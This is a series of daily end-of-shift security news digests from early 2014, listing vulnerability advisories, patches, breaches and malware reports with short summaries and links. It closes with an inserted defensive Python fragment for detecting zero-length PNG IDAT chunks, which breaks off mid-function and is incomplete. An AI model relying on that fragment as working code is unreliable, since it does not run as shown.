*** [2014-03-07] Unauthenticated access & manipulation of settings in Huawei E5331 MiFi mobile hotspot ***
---------------------------------------------
Unauthenticated attackers are able to gain access to sensitive configuration data (e.g. WLAN passwords in clear text or IMEI/SIM card information) and can even manipulate all settings in the web administration interface. Depending on the mobile operator's setup this can even be exploited remotely via the Internet, or via CSRF attacks.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** HP-UX m4(1) Command Flaw Lets Local Users Gain Elevated Privileges ***
---------------------------------------------
A vulnerability was reported in HP-UX. A local user can obtain elevated privileges on the target system.
A local user can exploit an unspecified flaw in the HP-UX m4(1) command to gain elevated privileges.
---------------------------------------------
http://www.securitytracker.com/id/1029881
*** Attack on AVM routers: Fritzbox hole disclosed, millions of routers at risk ***
---------------------------------------------
The grace period is over: details of how to exploit the critical vulnerability in the Fritzbox are circulating on the net. That means acute danger, because according to heise Security's findings a very large number of AVM routers are still vulnerable.
---------------------------------------------
http://www.heise.de/security/meldung/Hack-gegen-AVM-Router-Fritzbox-Luecke-…
*** ComiXology hacked: users must change their passwords ***
---------------------------------------------
ComiXology, the largest digital comics platform, fell victim to unauthorised access to databases holding usernames, e-mail information and encrypted passwords.
---------------------------------------------
http://futurezone.at/digital-life/comixology-gehackt-user-muessen-passwort-…
*** Into the network via the printer: PDF trojan turns IP phones into bugs ***
---------------------------------------------
Attackers can attack a network solely by abusing holes in devices such as network printers or VoIP phones. A demonstration showed how the phones can be turned into listening devices.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Via-Drucker-ins-Netz-PDF-Trojaner-ve…
*** Microsoft Security Bulletin Advance Notification for March 2014 ***
---------------------------------------------
* Remote Code Execution: Microsoft Windows, Internet Explorer
* Remote Code Execution: Microsoft Windows
* Elevation of Privilege: Microsoft Windows
* Security Feature Bypass: Microsoft Windows
* Security Feature Bypass: Microsoft Silverlight
---------------------------------------------
http://technet.microsoft.com/en-us/security/bulletin/ms14-mar
*** PHP 5.4.26 and 5.5.10 available. Several Security Fixes @ : http://www.php.net/downloads.php, (Fri, Mar 7th) ***
---------------------------------------------
PHP 5.4.26 and 5.5.10 are available with several security fixes: http://www.php.net/downloads.php -- Tom Webb, SANS Internet Storm Center
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17777&rss
*** Windows XP: German federal government worried about ATM security ***
---------------------------------------------
Microsoft's support for Windows XP ends on 8 April. According to the Interior Ministry, the BSI therefore considers it necessary to use current operating systems that still receive security updates.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Windows-XP-Bundesregierung-sorgt-sic…
*** New Attacks on HTTPS Traffic Reveal Plenty About Your Web Surfing ***
---------------------------------------------
Researchers at UC Berkeley have developed new attacks that analyze HTTPS traffic and can accurately determine what pages youve visited during an encrypted session.
---------------------------------------------
http://threatpost.com/new-attacks-on-https-traffic-reveal-plenty-about-your…
*** Open-source CMS: security update for Joomla ***
---------------------------------------------
The Joomla developer team has released a security update for both currently supported release branches of the open-source CMS. Joomla 2.5.19 and Joomla 3.2.3 are meant to close recently discovered vulnerabilities in the content management system.
---------------------------------------------
http://www.heise.de/newsticker/meldung/Open-Source-CMS-Sicherheitsupdate-fu…
*** FFmpeg Multiple Vulnerabilities ***
---------------------------------------------
Multiple vulnerabilities have been reported in FFmpeg, which can be exploited by malicious people to cause a DoS (Denial of Service) in an application using the library.
---------------------------------------------
https://secunia.com/advisories/57282
*** Security Bulletin: Multiple vulnerabilities in IBM QRadar SIEM (CVE-2014-0838, CVE-2014-0835, CVE-2014-0836, CVE-2014-0837) ***
---------------------------------------------
Multiple vulnerabilities exist in the AutoUpdate settings page and the AutoUpdate process within IBM QRadar SIEM that, when used together, could result in remote code execution. CVE(s): CVE-2014-0835, CVE-2014-0836, CVE-2014-0837 and CVE-2014-0838. Affected product(s) and version(s): IBM QRadar Security Information and Event Manager (SIEM) 7.2 MR1 and earlier. Refer to the following reference URLs for remediation and additional vulnerability details. Source Bulletin:
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_mul…
*** Security Bulletin: Information regarding security vulnerability in IBM SDK Java™ Technology Edition that is shipped with IBM WebSphere Application Server and addressed by Oracle CPU January 2014 ***
---------------------------------------------
Multiple security vulnerabilities exist in the IBM SDK Java Technology Edition that is shipped with IBM WebSphere Application Server and included in the products that are listed in this document.
CVE(s): CVE-2014-0411
Affected product(s) and affected version(s): WebSphere Process Server V6.1.2, 6.2.x, 7.0.x; WebSphere Process Server on z/OS V6.2.x, 7.0.x; WebSphere Process Server Hypervisor Edition for Red Hat Enterprise Linux Server for x86 (32-bit) V7.0.0; WebSphere Process Server Hypervisor
---------------------------------------------
https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_inf…
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 05-03-2014 18:00 − Thursday 06-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** Apple OpenSSL Verification Surprises ***
---------------------------------------------
Apple ships a patched version of OpenSSL with OS X. If no precautions are taken, their changes rob you of the power to choose your trusted CAs, and break the semantics of a callback that can be used for custom checks and verifications in client software.
---------------------------------------------
https://hynek.me/articles/apple-openssl-verification-surprises/
*** Sefnit's Tor botnet C&C details ***
---------------------------------------------
We have talked about the impact that resulted from the Sefnit botnet Tor hazard as well as the clean-up effort that went into that threat. In this post we'd like to introduce some of the details regarding the Tor component's configuration and its communication with the Tor service. Specifically, we'll talk about how Trojan:Win32/Sefnit.AT communicates with the Tor network, what domains it tries to contact, and where it keeps its configuration data. After Sefnit...
---------------------------------------------
https://blogs.technet.com/b/mmpc/archive/2014/03/05/sefnit-s-tor-botnet-c-a…
*** Cisco routers with passwords in the web interface source code ***
---------------------------------------------
Two routers and a firewall from Cisco have a security hole that allows attackers to log in with administrator rights. The devices disclose the passwords in the source code of the login window.
---------------------------------------------
http://www.heise.de/security/meldung/Cisco-Router-mit-Passwoertern-im-Quell…
*** Acute wave of attacks on D-Link modems ***
---------------------------------------------
Thousands of Internet connections are acutely at risk due to a security hole in DSL modems from D-Link - in Germany alone. The vulnerability is already being systematically abused for attacks. Anyone operating affected devices must act immediately.
---------------------------------------------
http://www.heise.de/security/meldung/Akute-Angriffsserie-auf-D-Link-Modems-…
*** Joomla! Core - Multiple Vulnerabilities ***
---------------------------------------------
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/xcttKR2_t_4/578-20140301-c…
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/-FMP5B4UydI/579-20140302-c…
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/3SC6NBuk13g/580-20140303-c…
http://feeds.joomla.org/~r/JoomlaSecurityNews/~3/oiSyKvvYgXA/581-20140304-c…
*** SA-CONTRIB-2014-028 - Masquerade - Access bypass ***
---------------------------------------------
Advisory ID: DRUPAL-SA-CONTRIB-2014-028
Project: Masquerade (third-party module)
Version: 6.x, 7.x
Date: 2014-March-05
Security risk: Highly critical
Exploitable from: Remote
Vulnerability: Access bypass
Description
This module allows a user with the right permissions to switch users. When a user has been limited to only masquerading as certain users via the "Enter the users this user is able to masquerade as" user profile field, they can still masquerade as any user on the site by using the...
---------------------------------------------
https://drupal.org/node/2211401
*** Security Bulletins: Citrix NetScaler Application Delivery Controller Multiple Security Vulnerabilities ***
---------------------------------------------
A number of security vulnerabilities have been identified in Citrix NetScaler Application Delivery Controller (ADC).
---------------------------------------------
http://support.citrix.com/article/CTX139049
*** HP Data Protector Backup Client Service Remote Code Execution ***
---------------------------------------------
Topic: HP Data Protector Backup Client Service Remote Code Execution Risk: High Text:## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-fr...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030052
*** PHP date() is evil (XSS'able) ***
---------------------------------------------
Topic: PHP date() is evil (XSS'able) Risk: Low Text: I was playing with PHP (as usual) and I was thinking about date(). It's a PHP function that displays date in different ...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030046
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 04-03-2014 18:00 − Wednesday 05-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Christian Wojner
*** Windows XP: Microsoft pushes users to switch with a pop-up ***
---------------------------------------------
Microsoft wants to alert XP users more directly that support for the operating system is ending. In addition, the previously paid migration tool PCmover Express is to be made available free of charge - but the offer has a catch.
---------------------------------------------
http://www.heise.de/security/meldung/Windows-XP-Microsoft-draengt-mit-Popup…
*** 69 percent of the most popular Android apps transmit in plaintext ***
---------------------------------------------
In a study of 10,000 Android apps, researchers found that the majority do not encrypt their data connections at all, and a further 26 percent use SSL in a way that leaves the connection open to attack.
---------------------------------------------
http://www.heise.de/security/meldung/69-Prozent-der-beliebtesten-Android-Ap…
*** Pay up or the site goes down: extortion with DDoS attacks ***
---------------------------------------------
Attackers demand money to stop attacks on websites.
---------------------------------------------
http://derstandard.at/1392687169264
*** Blog: Tor hidden services - a safe haven for cybercriminals ***
---------------------------------------------
http://www.securelist.com/en/blog/8187/Tor_hidden_services_a_safe_haven_for…
*** Malware uses iTunes as bait ***
---------------------------------------------
Fake iTunes pages lure users into installing the supposed Apple software - instead, the user receives malware. Prominently placed search engine advertising for the term "iTunes" serves as the feeder.
---------------------------------------------
http://www.heise.de/security/meldung/Malware-nutzt-iTunes-als-Lockmittel-21…
*** Apache Shiro 1.2.2 LDAP Authentication Bypass ***
---------------------------------------------
Topic: Apache Shiro 1.2.2 LDAP Authentication Bypass Risk: High Text:Dear Apache Shiro Community, The Apache Shiro team has released Apache Shiro version 1.2.3. This is the third bug fix point...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030034
*** Windows Escalate UAC Protection Bypass (In Memory Injection) ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030039
*** HPSBHF02965 rev.1 - HP Security Management System, Remote Execution of Arbitrary Code ***
---------------------------------------------
A potential security vulnerability has been identified with HP Security Management System. The vulnerability could be remotely exploited to allow remote execution of arbitrary code.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** HPSBUX02973 SSRT101455 rev.1 - HP-UX Running Java6/7, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities ***
---------------------------------------------
Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other vulnerabilities.
---------------------------------------------
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…
*** WordPress Relevanssi Plugin "category_name" SQL Injection Vulnerability ***
---------------------------------------------
https://secunia.com/advisories/56641
*** Java OpenID Server 1.2.1 XSS / Session Fixation ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030037
*** VU#823452: Serena Dimensions CM 12.2 Build 7.199.0 web client vulnerabilities ***
---------------------------------------------
Serena Dimensions CM 12.2 Build 7.199.0 web client and possibly earlier versions contains multiple cross-site scripting vulnerabilities.
CWE-79: Improper Neutralization of Input
---------------------------------------------
http://www.kb.cert.org/vuls/id/823452
=======================
= End-of-Shift report =
=======================
Timeframe: Monday 03-03-2014 18:00 − Tuesday 04-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Stephan Richter
*** TLS: security hole in client authentication ***
---------------------------------------------
Once again there are problems with the TLS protocol. With the Triple Handshake attack, a malicious HTTPS server can fool another server into believing it holds a user's certificate. Most users are probably not affected by the attack.
---------------------------------------------
http://www.golem.de/news/tls-sicherheitsluecke-bei-client-authentifizierung…
*** Web hosting: FTP as a security risk ***
---------------------------------------------
Anyone running their own website usually transfers it to the web host via FTP. Often no encryption is used in the process. Not a single major provider adequately informs its customers about these risks; with some providers an encrypted connection is not possible at all.
---------------------------------------------
http://www.golem.de/news/webspace-sicherheitsrisiko-ftp-1403-104889-rss.html
*** Large-scale attack on routers: DNS settings manipulated ***
---------------------------------------------
Researchers discovered a large-scale attack on routers: on more than 300,000 routers in home or office use, the DNS settings were reportedly manipulated. The attackers could thereby have redirected the devices' traffic at any time.
---------------------------------------------
http://www.heise.de/security/meldung/Grossangriff-auf-Router-DNS-Einstellun…
*** Security hole: GnuTLS now has its own "goto fail" ***
---------------------------------------------
The open-source library for secured connections also has a serious error when verifying certificates. Current patches are intended to fix it.
---------------------------------------------
http://www.heise.de/security/meldung/Sicherheitsluecke-GnuTLS-jetzt-mit-got…
*** GNUTLS-SA-2014-2 - Certificate Verification Issue ***
---------------------------------------------
A vulnerability was discovered that affects the certificate verification functions of all gnutls versions. A specially crafted certificate could bypass certificate validation checks.
---------------------------------------------
http://gnutls.org/security.html#GNUTLS-SA-2014-2
*** WordPress plugin Google Analytics MU 2.3 CSRF ***
---------------------------------------------
Topic: WordPress plugin Google Analytics MU 2.3 CSRF Risk: Low Text:Details = Software: Google Analytics MU Version: 2.3 Homepage: http://wordpress.org/plugins/google-analytics-mu/ CVSS...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030018
*** Joomla 3.2.2 Cross Site Scripting ***
---------------------------------------------
Topic: Joomla 3.2.2 Cross Site Scripting Risk: Low Text:# == # Title ...| Persistent pre-auth XSS in Joomla # Version .| Joomla 3.2.2 # Date ....| 3.03.2014 #...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030030
=======================
= End-of-Shift report =
=======================
Timeframe: Friday 28-02-2014 18:00 − Monday 03-03-2014 18:00
Handler: Alexander Riepl
Co-Handler: Christian Wojner
*** Complex espionage software named Uroburos discovered ***
---------------------------------------------
Security experts at G Data have discovered suspected intelligence-agency software that is apparently aimed at stealing highly sensitive and secret information from government institutions, intelligence services and large corporations.
---------------------------------------------
http://www.heise.de/security/meldung/Komplexe-Spionagesoftware-namens-Urobu…
*** Multiple vulnerabilities in Oracle Demantra 12.2.1 ***
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014030004
http://cxsecurity.com/issue/WLB-2014030007
http://cxsecurity.com/issue/WLB-2014030006
http://cxsecurity.com/issue/WLB-2014030005
*** "Encryption where possible" for more security ***
---------------------------------------------
Strong encryption or only "encryption where possible" against the NSA and its ilk? That was the subject of debate at the STRINT workshop of the IETF and the W3C in London over the weekend.
---------------------------------------------
http://www.heise.de/security/meldung/Wo-moeglich-Verschluesselung-fuer-mehr…
*** DSA-2868 php5 ***
---------------------------------------------
denial of service
---------------------------------------------
http://www.debian.org/security/2014/dsa-2868
*** WordPress VideoWhisper Live Streaming Plugin Multiple Cross-Site Scripting Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57202
*** Apache Camel XSLT XML External Entities and Arbitrary Code Execution Vulnerabilities ***
---------------------------------------------
https://secunia.com/advisories/57125
*** Background: VM detection in malware ***
---------------------------------------------
The red pill or the blue pill? More and more malware wants to know whether its environment is real or merely virtual.
---------------------------------------------
http://www.heise.de/security/artikel/VM-Erkennung-in-Malware-2131459.html
*** The Mobile Cybercriminal Underground Market in China ***
---------------------------------------------
The availability of affordable mobile Internet access has changed the computing landscape everywhere. More and more people are using mobile devices both for work and for entertainment. China is no exception. According to a report published by the China Internet Network Information Center (CNNIC), 81% of Chinese Internet users went online using their mobile phone ..
---------------------------------------------
http://blog.trendmicro.com/trendlabs-security-intelligence/the-mobile-cyber…
=======================
= End-of-Shift report =
=======================
Timeframe: Thursday 27-02-2014 18:00 − Friday 28-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Are Automated Update Services the Next Surveillance Frontier? ***
---------------------------------------------
Automated update services that provide users with security patches and feature enhancements are also a potential hunting ground for intelligence agencies and law enforcement surveillance activity.
---------------------------------------------
http://threatpost.com/are-automated-update-services-the-next-surveillance-f…
*** DDoS and BCP 38, (Thu, Feb 27th) ***
---------------------------------------------
Quite often on many lists we will hear the term Best Current Practice (BCP) 38 bandied about and further recommendations to implement [1][2][3][4] (see NANOG mailing list archive). Some will say "it will aid in DDoS mitigation" and others will even state "All Internet Service Providers (ISP) should implement this." Now before the philosophical discussions ensue in the comments, it might be a good idea to discuss, technically, what it is? And perhaps what it can do?
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17735&rss
*** Oversharing, (Fri, Feb 28th) ***
---------------------------------------------
When ISC reader Michael contacted us about "odd UDP traffic from all over" that he was suddenly seeing in his firewall log, we at first assumed that his Internet connection had "inherited" a dynamic IP address that had before been used by a rampant file sharing user, and that Michael was now seeing the "after glow". We still asked for a PCAP (tcpdump) file though, and when we looked at what Michael sent back, we saw to our surprise...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17737&rss
*** Highly Effective Joomla Backdoor with Small Profile ***
---------------------------------------------
It feels like every day we're finding gems, or what appear to be gems to us. We try to balance the use of the term, but I can't lie, these are truly gems. The things they are doing, and by they I mean the attackers, are in some instance ingenious. I think you'll agree that...
---------------------------------------------
http://blog.sucuri.net/2014/02/highly-effective-joomla-backdoor-with-small-…
*** Tilon/SpyEye2 intelligence report ***
---------------------------------------------
Tilon, son of Silon, or... SpyEye2 evolution of SpyEye? The malware family commonly known as Tilon has been around for several years now. While several public analysis reports have described the malware, no one has thus far linked it with the well-known SpyEye malware family. In light of the recent news of the guilty plea...
---------------------------------------------
http://blog.fox-it.com/2014/02/25/tilonspyeye2-intelligence-report/
*** Malicious Proxy Auto-Config redirection ***
---------------------------------------------
Internet banking credentials are a desired target for cybercriminals. They can be targeted with man-in-the-middle attacks or through password stealing trojans such as Fareit, Zbot or Banker. A less known method to gain unauthorized access to a user's banking credentials, yet one commonly found in South America and to a lesser extent in Russia, is through malicious Proxy Auto-Config (PAC) files. Normally, PAC files offer similar functionality to the hosts file, allowing IP/website redirection,...
---------------------------------------------
http://blogs.technet.com/b/mmpc/archive/2014/02/28/malicious-proxy-auto-con…
*** Notorious "Gameover" malware gets itself a kernel-mode rootkit... ***
---------------------------------------------
Zeus, also known as Zbot, is a malware family that we have written about many times on Naked Security...
---------------------------------------------
http://nakedsecurity.sophos.com/2014/02/27/notorious-gameover-malware-gets-…
*** [2014-02-28] Authentication bypass (SSRF) and local file disclosure in Plex Media Server ***
---------------------------------------------
The Plex Media Server proxy functionality fails to properly validate pre-authentication user requests. This allows unauthenticated attackers to make the Plex Media Server execute arbitrary HTTP requests and hence bypass all authentication and execute commands with administrative privileges. Furthermore, because of insufficient input validation, arbitrary local files can be disclosed without prior authentication including passwords and other sensitive information.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** [2014-02-28] Privilege escalation vulnerability in MICROSENS Profi Line Modular Industrial Switch Web Manager ***
---------------------------------------------
Attackers are able to elevate privileges during login from read-only user rights to full read/write or debug access rights by simply changing result values of the affected CGI script. This allows attackers to reconfigure the device.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** VU#534284: Synology DiskStation Manager VPN module hard-coded password vulnerability ***
---------------------------------------------
Synology DiskStation Manager 4.3-3810 update 1 and possibly earlier versions contain a VPN server module which contains a hard-coded password which cannot be changed. According to the original forum post...
---------------------------------------------
http://www.kb.cert.org/vuls/id/534284
*** Moodle 2.6.1 Cross Site Scripting ***
---------------------------------------------
Topic: Moodle 2.6.1 Cross Site Scripting Risk: Low Text:# == # Title ...| Moodle 2.6.1 # Version .| (Feb 27 2014) moodle-latest-26.zip # Date ....| 27.02.2014...
---------------------------------------------
http://cxsecurity.com/issue/WLB-2014020247
*** Cisco IPS MainApp SNMP Denial of Service Vulnerability ***
---------------------------------------------
A vulnerability in the SNMP code of Cisco Intrusion Prevention System (IPS) Software could allow an unauthenticated, remote attacker to cause the MainApp process to become unresponsive. This creates a denial of service (DoS) condition because the Cisco IPS sensor is not able to execute several critical tasks including alert notification, event store management, and sensor authentication. The Cisco IPS web server will also be unavailable while the MainApp process is unresponsive. Additionally, due to this general system failure, other processes such as the Analysis Engine may not function properly.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Cisco Unified Communications Domain Manager Cross-Site Scripting Vulnerability ***
---------------------------------------------
A vulnerability in the web framework of Cisco Unified Communications Domain Manager could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web interface on the affected system.
---------------------------------------------
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…
*** Schneider Electric Floating License Manager Vulnerability ***
---------------------------------------------
Schneider Electric had become aware of an "unquoted service path" vulnerability in the Schneider Electric Floating License Manager, produced a patch that mitigates this vulnerability, and notified NCCIC/ICS-CERT.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-058-01
*** Schneider Electric OFS Buffer Overflow Vulnerability ***
---------------------------------------------
Schneider Electric has reported to NCCIC/ICS-CERT a Stack Buffer Overflow vulnerability supplied with the Schneider Electric OPC Factory Server (OFS).
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-14-058-02
=======================
= End-of-Shift report =
=======================
Timeframe: Wednesday 26-02-2014 18:00 − Thursday 27-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Avaya to Patch Zero Days That Turn IP Phone into Radio Transmitters ***
---------------------------------------------
Avaya is expected to patch zero-day vulnerabilities in its latest one-X IP phones. The vulnerabilities and an exploit will be demonstrated this week at RSA Conference 2014.
---------------------------------------------
http://threatpost.com/avaya-to-patch-zero-days-that-turn-ip-phone-in-radio-…
*** Detecting malware on Mac OS X with USM and MIDAS ***
---------------------------------------------
Let's briefly review what we accomplished in the first post:
- Understood the capabilities and design of MIDAS
- Deployed MIDAS on a Mac OS X endpoint
- Installed the MIDAS plugin in AlienVault USM
- Verified the integration by running MIDAS and confirming the events in the SIEM
How does this make us safer? More generally, what does this mean? To answer these questions we need to understand what plists and kexts mean from a security perspective. Plists: Property list files contain configuration data...
---------------------------------------------
http://www.alienvault.com/open-threat-exchange/blog/detecting-malware-on-ma…
*** Ongoing NTP Amplification Attacks, (Wed, Feb 26th) ***
---------------------------------------------
Brett, who alerted us earlier this month regarding the mass exploit against Linksys devices, has surfaced a current issue he's facing with ongoing NTP amplification attacks. A good US-CERT summary of the attack is here: https://www.us-cert.gov/ncas/alerts/TA14-013A. Brett indicates that: "We are seeing massive attacks on our NTP servers, attempting to exploit the traffic amplification vulnerability reported last month. Our IPs are being probed by an address in the Netherlands, and a couple...
---------------------------------------------
http://isc.sans.edu/diary.html?storyid=17723&rss
*** Yes, You Too Can Be An Evil Network Overlord - On The Cheap With OpenBSD, pflow And nfsen ***
---------------------------------------------
Have you ever wanted to know what's really going on in your network? Some free tools with surprising origins can help you to an almost frightening degree. One question I get a lot (or variants that end up being very close) is, "How do you keep up with what's happening in your network?". A close cousin is "how much do you actually know about your users?". The exact answer to both can have legal implications, so before I proceed to the tech content, I'll ask you to make sure you...
---------------------------------------------
http://bsdly.blogspot.com/2014/02/yes-you-too-can-be-evil-network.html
*** Weekly Metasploit Update: Encoding-Fu, New Powershell Payload, Bug Fixes ***
---------------------------------------------
In this week's Metasploit weekly update, we begin with OJ TheColonial Reeves' new optimized sub encoding module (opt_sub.rb). As the name implies, this encoder takes advantage of the SUB assembly instruction to encode a payload with printable characters that are file path friendly. Encoders like this are incredibly useful for developing a memory corruption exploit...
---------------------------------------------
https://community.rapid7.com/community/metasploit/blog/2014/02/26/weekly-me…
*** Security: Cisco opens up the Snort interface ***
---------------------------------------------
A few weeks after acquiring Snort developer Sourcefire, Cisco has made the interface to the intrusion detection system public under the name OpenAppID. In addition, the acquired company's malware protection has been integrated into Cisco's security portfolio.
---------------------------------------------
http://www.golem.de/news/security-cisco-oeffnet-snort-schnittstelle-1402-10…
*** Mac OS X 10.6 Snow Leopard: Apple no longer issues updates ***
---------------------------------------------
The last two major security updates from Apple were only made available for Mavericks, Mountain Lion and Lion. Yet OS X 10.6 is still relatively widespread.
---------------------------------------------
http://www.heise.de/security/meldung/Mac-OS-X-10-6-Snow-Leopard-Apple-aktua…
*** Was the iOS SSL Flaw Deliberate? ***
---------------------------------------------
Last October, I speculated on the best ways to go about designing and implementing a software backdoor. I suggested three characteristics of a good backdoor: low chance of discovery, high deniability if discovered, and minimal conspiracy to implement. The critical iOS vulnerability that Apple patched last week is an excellent example. Look at the code. What caused the vulnerability is...
---------------------------------------------
https://www.schneier.com/blog/archives/2014/02/was_the_ios_ssl.html
*** Android & iOS: free tools for malware analysis ***
---------------------------------------------
The Linux distribution Santoku comes with all the tools needed to examine malware and other apps for iOS and Android professionally. A combination of an app and a web service analyses, among other things, the data streams of apps.
---------------------------------------------
http://www.heise.de/security/meldung/Android-iOS-Gratis-Werkzeuge-zur-Malwa…
*** Atlassian - Security Bypass Vulnerabilities in various Products ***
---------------------------------------------
Security Bypass Vulnerabilities in Atlassian Bamboo, Confluence, FishEye, JIRA, Crucible and Stash
---------------------------------------------
https://secunia.com/advisories/57086
https://secunia.com/advisories/57088
https://secunia.com/advisories/57095
https://secunia.com/advisories/57105
https://secunia.com/advisories/56842
https://secunia.com/advisories/56936
*** [2014-02-27] Local Buffer Overflow vulnerability in SAS for Windows ***
---------------------------------------------
Attackers are able to completely compromise SAS clients when a malicious SAS program gets executed as the software "SAS for Windows" is affected by a local buffer overflow vulnerability.
---------------------------------------------
https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014…
*** Drupal - Vulnerabilities in third-party Modules and Themes ***
---------------------------------------------
Vulnerabilities in Open Omega (third-party theme), Content locking (anti-concurrent editing) (third-party module), Project Issue File Review (third-party module) and Mime Mail (third-party module)
---------------------------------------------
https://drupal.org/node/2205877
https://drupal.org/node/2205807
https://drupal.org/node/2205767
https://drupal.org/node/2205991
*** Schneider Electric CitectSCADA Products Exception Handler Vulnerability (Update A) ***
---------------------------------------------
This updated advisory is a follow-up to the original advisory titled ICSA-13-350-01 Schneider Electric SCADA Products Exception Handler Vulnerability that was published February 25, 2014, on the NCCIC/ICS-CERT web site. This advisory was originally posted to the US-CERT secure Portal library on December 16, 2013. Schneider Electric requested the title change to reduce confusion.
---------------------------------------------
http://ics-cert.us-cert.gov/advisories/ICSA-13-350-01A
=======================
= End-of-Shift report =
=======================
Timeframe: Tuesday 25-02-2014 18:00 − Wednesday 26-02-2014 18:00
Handler: Stephan Richter
Co-Handler: n/a
*** Chameleon: research virus spreads from WLAN to WLAN ***
---------------------------------------------
British scientists have created a complete router worm named "Chameleon" that does not need the Internet. The malware copies itself from one router to another via WLAN and can thus spread like an epidemic. But ways of defending against such threats are also foreseeable.
---------------------------------------------
http://www.golem.de/news/chameleon-forschungs-virus-verbreitet-sich-von-wla…
*** DDoSing a Cell Phone Network ***
---------------------------------------------
Interesting research: Abstract: The HLR/AuC is considered to be one of the most important network elements of a 3G network. It can serve up to five million subscribers and at least one transaction with HLR/AuC is required for every single phone call or data session. This paper presents experimental results and observations that can be exploited to perform a novel...
---------------------------------------------
https://www.schneier.com/blog/archives/2014/02/ddosing_a_cell.html
*** IE Zero-day Exploit Being Used in Widespread Attacks ***
---------------------------------------------
The number of attacks exploiting a yet-to-be-patched vulnerability in Internet Explorer has increased dramatically over the past few days, indicating the exploit is no longer used just in targeted attacks against particular groups of people.
---------------------------------------------
http://www.cio.com/article/748778/IE_Zero_day_Exploit_Being_Used_in_Widespr…
*** QuickTime 7.7.5 for Windows fixes various security holes ***
---------------------------------------------
Apple's multimedia environment contains a whole series of security-relevant bugs under Windows. Version 7.7.5 is meant to fix them - a prompt update is advised.
---------------------------------------------
http://www.heise.de/security/meldung/QuickTime-7-7-5-fuer-Windows-behebt-di…
*** Announcing EMET 5.0 Technical Preview ***
---------------------------------------------
Today, we are thrilled to announce a preview release of the next version of the Enhanced Mitigation Experience Toolkit, better known as EMET. You can download EMET 5.0 Technical Preview here. This Technical Preview introduces new features and enhancements that we expect to be key components of the final EMET 5.0 release. We are releasing this technical preview to gather customer feedback about the new features and enhancements. Your feedback will affect the final EMET 5.0 technical
---------------------------------------------
https://blogs.technet.com/b/srd/archive/2014/02/25/announcing-emet-5-0-tech…
*** VU#684412: libpng denial-of-service vulnerability ***
---------------------------------------------
Vulnerability Note VU#684412: libpng denial-of-service vulnerability. Original Release date: 25 Feb 2014 | Last revised: 25 Feb 2014. Overview: libpng versions 1.6.0 through 1.6.9 contain a denial-of-service vulnerability. Description: CWE-835: Loop with Unreachable Exit Condition (Infinite Loop) - CVE-2014-0333. Glenn Randers-Pehrson of the PNG Development Group reports: The progressive decoder in libpng16 enters an infinite loop, thus hanging the application, when it encounters a zero-length IDAT...
---------------------------------------------
http://www.kb.cert.org/vuls/id/684412
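As an added example (not CERT/CC's or libpng's code), the following Python walks a PNG's chunk list, verifies each chunk's CRC and reports any zero-length IDAT chunk, so an upload handler can reject such a file before a vulnerable progressive decoder sees it; the two sample PNGs are constructed inside the block.

```python
"""Pre-screen PNG files for the zero-length IDAT chunk described in VU#684412.

Added example, not libpng or CERT/CC code: walk the chunk list of a PNG,
check structure and CRCs, and report any IDAT chunk whose length is zero.
The two sample files at the bottom are constructed here for demonstration.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def iter_chunks(data):
    """Yield (chunk_type, payload) for each chunk in file order.

    Raises ValueError on a bad signature, truncation, CRC mismatch or a
    missing IEND, so callers can reject malformed files outright.
    """
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIGNATURE)
    while pos < len(data):
        if pos + 8 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        start = pos + 8
        end = start + length
        if end + 4 > len(data):
            raise ValueError("truncated chunk %r" % ctype)
        payload = data[start:end]
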